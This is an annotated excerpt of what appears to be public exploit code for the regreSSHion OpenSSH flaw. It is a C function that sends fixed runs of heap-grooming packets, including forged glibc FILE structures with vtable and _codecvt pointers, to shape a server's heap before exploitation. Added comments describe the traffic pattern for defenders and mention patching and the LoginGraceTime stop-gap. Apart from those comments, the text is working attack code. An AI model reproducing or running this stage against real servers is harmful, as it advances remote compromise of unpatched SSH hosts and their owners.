regresshion exploit
/*
 * prepare_heap - send four groups of heap-shaping packets over `sock`.
 *
 * Every payload goes out through send_packet() with packet type 5; what that
 * type means to the peer is defined outside this excerpt. In order:
 *   a) 10 payloads of 64 bytes filled with 'A'
 *   b) 27 pairs: 8192 bytes of 'B' followed by 320 bytes of 'C'
 *   c) 27 payloads of 4096 bytes built by create_fake_file_structure()
 *      against GLIBC_BASES[0]
 *   d) one payload of MAX_PACKET_SIZE - 1 bytes filled with 'E'
 *
 * The purpose given for each group below (tcache population, paired holes,
 * fake headers/footers/vtable/_codecvt pointers, bin placement) is the
 * original author's description; nothing in this function checks how the
 * server's allocator actually reacts.
 *
 * Defender's note: the groups are fixed-count, fixed-size runs, and groups
 * a, b and d carry a single repeated byte value. That regular shape is
 * something to look for when reviewing captures of traffic sent to an
 * exposed server.
 * NOTE(review): the page title labels this regreSSHion exploit code. The
 * remedy on the server side is a patched OpenSSH release; `LoginGraceTime 0`
 * in sshd_config is the commonly cited stop-gap and trades the issue for
 * connection-slot exhaustion - confirm both against the vendor advisory.
 */
void
prepare_heap(int sock) {
    enum {
        PKT_TYPE = 5,
        TCACHE_ROUNDS = 10,
        HOLE_PAIRS = 27,
        FAKE_ROUNDS = 27
    };

    /* Group a: small chunks the author expects the server to free,
     * populating its tcache. */
    int remaining = TCACHE_ROUNDS;
    while (remaining-- > 0) {
        unsigned char small_fill[64];

        memset(small_fill, 'A', sizeof(small_fill));
        send_packet(sock, PKT_TYPE, small_fill, sizeof(small_fill));
    }

    /* Group b: alternating large (~8KB) and small (320B) payloads, meant to
     * leave paired holes on the server heap. */
    remaining = HOLE_PAIRS;
    while (remaining-- > 0) {
        unsigned char big_fill[8192];
        unsigned char tiny_fill[320];

        memset(big_fill, 'B', sizeof(big_fill));
        send_packet(sock, PKT_TYPE, big_fill, sizeof(big_fill));

        memset(tiny_fill, 'C', sizeof(tiny_fill));
        send_packet(sock, PKT_TYPE, tiny_fill, sizeof(tiny_fill));
    }

    /* Group c: payloads carrying the fake headers, footers, vtable and
     * _codecvt pointers; the builder is called afresh for every packet and
     * always with the first GLIBC_BASES entry. */
    remaining = FAKE_ROUNDS;
    while (remaining-- > 0) {
        unsigned char forged[4096];

        create_fake_file_structure(forged, sizeof(forged), GLIBC_BASES[0]);
        send_packet(sock, PKT_TYPE, forged, sizeof(forged));
    }

    /* Group d: one near-maximum packet (~256KB per the original comment),
     * meant to push the holes into the intended malloc bins. */
    unsigned char filler[MAX_PACKET_SIZE - 1];

    memset(filler, 'E', sizeof(filler));
    send_packet(sock, PKT_TYPE, filler, sizeof(filler));
}